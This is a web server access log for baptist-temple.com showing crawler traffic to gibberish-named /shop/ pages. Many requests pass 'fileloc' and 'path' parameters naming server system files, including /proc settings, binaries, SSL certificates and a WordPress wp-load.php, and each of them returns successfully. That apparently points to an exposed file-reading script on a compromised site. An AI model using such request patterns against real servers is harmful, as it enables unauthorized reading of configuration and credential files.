2a03:2880:f800:: - - [13/Mar/2026:00:26:14 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/eu_FR/LC_MONETARY&path=//lib/locale/eu_FR HTTP/1.1" 200 12289 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:14 -0400] "GET /shop/scallion/couloir133623381506.html HTTP/1.1" 200 213251 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:14 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/x86_64-linux-gnu/libtinfo.so.6&path=//lib/x86_64-linux-gnu HTTP/1.1" 200 12270 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:15 -0400] "GET /shop/fallible/lookover162641977811.html?path=//lib/locale/bho_NP HTTP/1.1" 200 29967 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:16 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/nr_ZA/LC_NUMERIC&path=//lib/locale/nr_ZA HTTP/1.1" 200 12347 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:16 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/es_GT/LC_CTYPE&path=//lib/locale/es_GT HTTP/1.1" 200 12286 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:26:16 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv4/neigh/eth0/mcast_resolicit&path=//proc/sys/net/ipv4/neigh/eth0 HTTP/1.1" 200 12451 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv4/neigh/eth0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
144.76.32.0 - - [13/Mar/2026:00:26:16 -0400] "GET /shop/camptolaimus/ruthenious141054411276.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:16 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/touch&path=//bin HTTP/1.1" 200 12185 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:17 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/yo_NG/LC_NUMERIC&path=//lib/locale/yo_NG HTTP/1.1" 200 12347 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:17 -0400] "GET /shop/qualities/ribless131407165413.html HTTP/1.1" 200 222215 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:18 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/lzma&path=//kunden/usr/bin HTTP/1.1" 200 12279 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:18 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/ppmtomitsu&path=//kunden/usr/bin HTTP/1.1" 200 12285 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:19 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/gpg&path=//kunden/usr/bin HTTP/1.1" 200 12278 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:19 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/nr_ZA/LC_MONETARY&path=//lib/locale/nr_ZA HTTP/1.1" 200 12289 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:26:19 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv4/conf/eth0/tag&path=//proc/sys/net/ipv4/conf/eth0 HTTP/1.1" 200 12435 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv4/conf/eth0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:20 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/af_ZA/LC_IDENTIFICATION&path=//lib/locale/af_ZA HTTP/1.1" 200 12295 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:20 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/ro_RO.utf8/LC_ADDRESS&path=//lib/locale/ro_RO.utf8 HTTP/1.1" 200 12303 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:26:20 -0400] "GET /shop/canthi/intercontinental141457796035.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:20 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/yo_NG/LC_TELEPHONE&path=//lib/locale/yo_NG HTTP/1.1" 200 12354 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:21 -0400] "GET /shop/tetricous/helmage131450870607.html HTTP/1.1" 200 210526 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:21 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/x86_64-linux-gnu/libjpeg.a&path=//lib/x86_64-linux-gnu HTTP/1.1" 200 12266 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:22 -0400] "GET /shop/fallible/lookover162641977811.html?path=//kunden/lib/x86_64-linux-gnu HTTP/1.1" 200 1007602 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:22 -0400] "GET /shop/fallible/lookover162641977811.html?path=/homepages/lnk HTTP/1.1" 200 12653 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:26:22 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv6/conf/all/router_solicitation_interval&path=//proc/sys/net/ipv6/conf/all HTTP/1.1" 200 12457 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv6/conf/all" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:23 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/el_CY/LC_PAPER&path=//lib/locale/el_CY HTTP/1.1" 200 12286 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:23 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/uicron&path=//bin HTTP/1.1" 200 16460 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:24 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/tt_RU@iqtelif/LC_PAPER&path=//lib/locale/tt_RU@iqtelif HTTP/1.1" 200 12310 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:24 -0400] "GET /shop/exanthemata/metalorganic131313263456.html HTTP/1.1" 200 214389 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
144.76.32.0 - - [13/Mar/2026:00:26:24 -0400] "GET /shop/capitalness/salaciously143069002908.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:24 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=/homepages/42/d414105715/htdocs/demo/wp-load.php&path=/homepages/42/d414105715/htdocs/demo HTTP/1.1" 200 15912 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:25 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/ghostscript&path=//kunden/usr/bin HTTP/1.1" 200 12286 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:25 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/so_DJ.utf8/LC_MEASUREMENT&path=//lib/locale/so_DJ.utf8 HTTP/1.1" 200 12330 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:26 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/compare-im6&path=//kunden/usr/bin HTTP/1.1" 200 12286 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:26:26 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv6/conf/all/router_solicitations&path=//proc/sys/net/ipv6/conf/all HTTP/1.1" 200 12449 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv6/conf/all" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:26 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/ur_PK/LC_NUMERIC&path=//lib/locale/ur_PK HTTP/1.1" 200 12347 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:27 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/kunden/usr/include/memory.h&path=//kunden/kunden/usr/include HTTP/1.1" 200 13333 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:27 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/mr_IN/LC_IDENTIFICATION&path=//lib/locale/mr_IN HTTP/1.1" 200 12295 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:26:27 -0400] "GET /shop/carbohydrate/nycticorax143877192214.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:28 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/ca_ES/LC_COLLATE&path=//lib/locale/ca_ES HTTP/1.1" 200 12288 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:28 -0400] "GET /shop/impassive/uranian132699038129.html HTTP/1.1" 200 209991 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:28 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/ko_KR.euckr/LC_COLLATE&path=//lib/locale/ko_KR.euckr HTTP/1.1" 200 12306 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:29 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/kunden/usr/include/locale.h&path=//kunden/kunden/usr/include HTTP/1.1" 200 20148 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:29 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/so_DJ.utf8/LC_PAPER&path=//lib/locale/so_DJ.utf8 HTTP/1.1" 200 12301 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:26:29 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv4/conf/eth0/promote_secondaries&path=//proc/sys/net/ipv4/conf/eth0 HTTP/1.1" 200 12451 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv4/conf/eth0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:30 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/so_DJ.utf8/LC_ADDRESS&path=//lib/locale/so_DJ.utf8 HTTP/1.1" 200 12437 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:30 -0400] "GET /shop/quadroxide/rebreathe132991759129.html HTTP/1.1" 200 211701 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:30 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/pap_AW/LC_MONETARY&path=//lib/locale/pap_AW HTTP/1.1" 200 12292 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
52.167.144.0 - - [13/Mar/2026:00:26:30 -0400] "GET /shop/shipwrecking/leavened124113292498.html HTTP/1.1" 200 234362 baptist-temple.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:30 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=/homepages/29/d208662028/distributor.lock&path=/homepages/29/d208662028 HTTP/1.1" 200 12319 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
52.167.144.0 - - [13/Mar/2026:00:26:31 -0400] "GET /shop/commigration/jacobinical141647322960.html HTTP/1.1" 200 211521 www.baptist-temple.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:31 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/python3.9/lib2to3/fixes/fix_xrange.py&path=//lib/python3.9/lib2to3/fixes HTTP/1.1" 200 15333 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:26:31 -0400] "GET /shop/catervarius/selfdevoted142165682657.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:32 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/ppmtosixel&path=//bin HTTP/1.1" 200 12190 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:26:32 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv6/conf/eth0/router_solicitation_interval&path=//proc/sys/net/ipv6/conf/eth0 HTTP/1.1" 200 12460 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv6/conf/eth0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:32 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/lib/git-core/git-pull&path=//kunden/lib/git-core HTTP/1.1" 200 12298 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:33 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/python3.9/multiprocessing/__pycache__/sharedctypes.cpython-39.pyc&path=//lib/python3.9/multiprocessing/__pycache__ HTTP/1.1" 200 12435 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:33 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/ssl/certs/Buypass_Class_2_Root_CA.pem&path=//lib/ssl/certs HTTP/1.1" 200 14208 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
148.113.128.0 - - [13/Mar/2026:00:26:33 -0400] "GET /shop/uvularia/parts133952516571.html HTTP/1.1" 200 54919 www.baptist-temple.com "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:34 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/fa_IR/LC_NAME&path=//lib/locale/fa_IR HTTP/1.1" 200 12383 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:34 -0400] "GET /shop/incurvation/pulverizing131574093710.html HTTP/1.1" 200 217236 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:34 -0400] "GET /shop/fallible/lookover162641977811.html?path=//lib/locale/ko_KR.euckr/LC_MESSAGES HTTP/1.1" 200 14303 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:35 -0400] "GET /shop/coacher/mayors102099113446.html?path=/homepages/42 HTTP/1.1" 200 13983 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:26:35 -0400] "GET /shop/chaetodon/semiautomatic142973640450.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:35 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/is_IS/LC_PAPER&path=//lib/locale/is_IS HTTP/1.1" 200 12286 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:26:35 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv4/conf/lo/rp_filter&path=//proc/sys/net/ipv4/conf/lo HTTP/1.1" 200 12435 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv4/conf/lo" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:35 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/proc/vmstat&path=//kunden/proc HTTP/1.1" 200 14169 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:36 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/kunden/usr/include/wchar.h&path=//kunden/kunden/usr/include HTTP/1.1" 200 44010 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:37 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/ssl/certs/e36a6752.0&path=//lib/ssl/certs HTTP/1.1" 200 13537 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:37 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/ssl/certs/b727005e.0&path=//lib/ssl/certs HTTP/1.1" 200 14167 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:37 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/kunden/usr/include/linux/devlink.h&path=//kunden/kunden/usr/include/linux HTTP/1.1" 200 31362 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:38 -0400] "GET /shop/plagiostomous/uncircumstandtial133060357092.html HTTP/1.1" 200 213648 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:38 -0400] "GET /shop/vacuums/inveteracy132470794761.html HTTP/1.1" 200 219076 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:38 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/hu_HU.utf8/LC_TIME&path=//lib/locale/hu_HU.utf8 HTTP/1.1" 200 12300 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:38 -0400] "GET /shop/charbocle/auradin133627969637.html HTTP/1.1" 200 216278 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
144.76.32.0 - - [13/Mar/2026:00:26:38 -0400] "GET /shop/charsabanc/embryological14210210341.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:26:38 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv6/conf/all/mtu&path=//proc/sys/net/ipv6/conf/all HTTP/1.1" 200 12435 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv6/conf/all" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:39 -0400] "GET /shop/ratlings/semitonic111590458783.html HTTP/1.1" 200 211541 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:39 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/lb_LU/LC_COLLATE&path=//lib/locale/lb_LU HTTP/1.1" 200 12288 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:39 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/python3.9/__phello__.foo.py&path=//lib/python3.9 HTTP/1.1" 200 12317 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
52.167.144.0 - - [13/Mar/2026:00:26:40 -0400] "GET /shop/carina/swedenborgianism163285396105.html HTTP/1.1" 200 223016 baptist-temple.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:40 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/aa_ET/LC_TIME&path=//lib/locale/aa_ET HTTP/1.1" 200 12285 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:40 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/ku_TR.utf8/LC_TIME&path=//lib/locale/ku_TR.utf8 HTTP/1.1" 200 12300 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:41 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/csb_PL/LC_CTYPE&path=//lib/locale/csb_PL HTTP/1.1" 200 12289 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:41 -0400] "GET /shop/megalosaur/villain134285895660.html HTTP/1.1" 200 247129 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
